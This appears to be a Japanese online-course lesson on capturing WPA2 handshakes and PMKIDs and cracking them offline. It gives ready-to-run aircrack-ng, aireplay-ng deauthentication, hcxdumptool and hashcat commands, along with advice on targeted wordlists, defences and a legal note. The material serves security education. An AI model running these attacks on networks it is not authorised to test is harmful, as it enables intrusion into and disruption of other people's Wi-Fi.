WPA2ハンドシェイクのキャプチャと解析
aircrack-ngで4ウェイハンドシェイクをキャプチャし、Hashcatで辞書攻撃を試みます。
「WPA2ハンドシェイクのキャプチャと解析」はCoddyKit上の無料Cyber Security Academyレッスンです。 これはレッスン2/4です。 下記で完全なレッスンを無料で読むことができます。その後、ブラウザ内の組み込みコードエディタと24時間対応のAIチューターでハンズオン演習できます。 これはCyber Security Academy学習パスの一部であり、ウェブとCoddyKitアプリ全体で進捗が同期されます。 Cyber Security Academyコースには全4レッスンが含まれています。
4ウェイハンドシェイク
クライアントがWPA2ネットワークに接続すると、4ウェイハンドシェイクによって、PMK(PSKから導出)とランダムなnonceからPairwise Transient Key(PTK)が導出されます。このハンドシェイクをキャプチャすると、オフラインでパスワードをクラックできます。
モニターモードを設定する
モニターモードを使用すると、無線カードは宛先に関係なくすべてのフレームをキャプチャできます。これは、ハンドシェイクを受動的にキャプチャするために必要です。モニターモードに対応したカードでのみ動作します。
# Check wireless interface
iwconfig
# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon
# Kill interfering processes first:
sudo airmon-ng check kill受動的なハンドシェイクキャプチャ
Airodump-ngはフレームを受動的にキャプチャします。クライアントが自然に接続するまで待つか、deauthenticationによって再接続を強制します。ハンドシェイクをキャプチャすると、airodumpの出力の右上に表示されます。
# Scan for networks
sudo airodump-ng wlan0mon
# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
--bssid AA:BB:CC:DD:EE:FF \
-w handshake_capture \
wlan0mon
# Top right shows: WPA handshake: AA:BB:...認証解除攻撃
偽装したdeauthフレームを送信すると、接続中のクライアントが切断および再接続され、新しいハンドシェイクのキャプチャが発生します。この攻撃は通信量が多く検出されやすいうえ、クライアントが通信範囲内にいる必要があります。
# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
-a AA:BB:CC:DD:EE:FF \
-c CC:DD:EE:FF:00:11 \
wlan0mon
# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)PMKID攻撃:クライアント不要
PMKID攻撃(hcxdumptool)は、接続中のクライアントを必要とせず、ビーコンフレームやプローブフレームからPMKIDをキャプチャします。完全なハンドシェイクよりも速く取得でき、同じようにクラック可能です。
# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
-o pmkid.pcapng
# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txtHashcatでハンドシェイクをクラックする
キャプチャファイルを変換し、Hashcatのモード22000(WPA2統合形式)またはモード2500(レガシー形式)で攻撃します。最良の結果を得るには、rockyou.txtとルールを併用してください。
# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap
# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt
# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule
# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?dAircrack-ngでクラックする
Aircrack-ngは、キャプチャファイルから直接、CPUベースでWPA2のクラックを実行します。HashcatによるGPUクラックより低速ですが、形式の変換は必要ありません。
# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap
# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.capワードリスト戦略
WPA2パスワードのクラックが成功するかどうかは、ワードリストの品質に完全に左右されます。基本となるrockyou.txt、変形用のHashcatルールセット、企業固有のワードリスト(名前+年+記号)、OSINTから作成した対象を絞ったリストを使用してください。
クラックにかかる時間の現実
20文字以上のランダムなWPA2パスワードをクラックするのは、計算上現実的ではありません。クラックが実用的なのは、短いパスワードや辞書ベースのパスワードに対してだけです。だからこそ、複雑さのルールよりもパスワードの長さとランダム性が重要です。
防御策
WPA3-SAE(オフライン辞書攻撃に耐性があります)、または20文字以上のランダムなパスフレーズを使用するWPA2を利用してください。さらに、パスワードの代わりに証明書を使用するEAP-TLS方式のWPA2-Enterpriseも使用してください。
法的な注意
自分が所有していないネットワーク上でWPA2ハンドシェイクをキャプチャすることは違法です。ここで扱うすべての技術は、自分自身のテストネットワークまたは許可を得たラボ環境(ホームラボや専用テストAPなど)でのみ使用してください。
クイックチェック
PMKID攻撃は、標準的なハンドシェイクキャプチャと比べて何を改善しますか?
まとめ:WPA2クラック
WPA2ハンドシェイク(またはPMKID)をキャプチャすると、Wi-Fiのクラックをオフライン辞書攻撃に変えられます。成功するかどうかはパスワードの強度に完全に左右されます。短く辞書ベースのパスワードはすぐに破られますが、長くランダムなパスワードは現実的にはクラックできません。WPA3-SAE、強力なパスフレーズ、企業ネットワーク向けのWPA2-Enterpriseで防御してください。
AI チューターと学ぶ Cyber Security Academy — 無料
ブラウザでリアルコードを書いて実行し、24/7 の AI チューターから瞬時にサポートを受け、ウェブまたはアプリで続きから学習できます。
- コース
- 76
- レッスン
- 303
よくある質問
「WPA2ハンドシェイクのキャプチャと解析」レッスンは無料ですか?
はい。「WPA2ハンドシェイクのキャプチャと解析」の完全なテキストはこのウェブで無料で読めます。インタラクティブに演習し(組み込みコードエディタと24時間対応のAIチューター)、Cyber Security Academyコースの残りをアンロックするには、CoddyKit PROにアップグレードしてください。 Cyber Security Academyコースには全4レッスンが含まれています。
「WPA2ハンドシェイクのキャプチャと解析」で何を学びますか?
aircrack-ngで4ウェイハンドシェイクをキャプチャし、Hashcatで辞書攻撃を試みます。 ブラウザで直接実行するハンズオンコードでCyber Security Academyを演習し、24時間対応のAIチューターがレッスンを進める中での質問に答えます。
Cyber Security Academyを始めるのに経験は必要ですか?
事前経験は必要ありません。CoddyKitのCyber Security Academyは初級者から上級者向けに構成されているため、ここから始めるか最初から始めて、自分のペースで進むことができます。 これはレッスン2/4です。
「WPA2ハンドシェイクのキャプチャと解析」レッスンにはどのくらい時間がかかりますか?
ほとんどのCoddyKitレッスンは約5~10分かかります。各レッスンはコンパクトでインタラクティブなので、着実に進歩し、ウェブとアプリ全体で正確に前回の場所から再開できます。
このCyber Security Academyレッスンでコードを書いて実行できますか?
はい。すべてのCyber Security Academyレッスンに組み込みコードエディタが含まれているため、ブラウザでリアルコードを書いて実行し、即座のAIフィードバックを取得できます。ローカル設定は不要です。
このコースのすべてのレッスン
- 802.11セキュリティプロトコル:WEP、WPA2、WPA3
- WPA2ハンドシェイクのキャプチャと解析
- Evil Twinとキャプティブポータル攻撃
- エンタープライズWi-Fi:EAPとRADIUS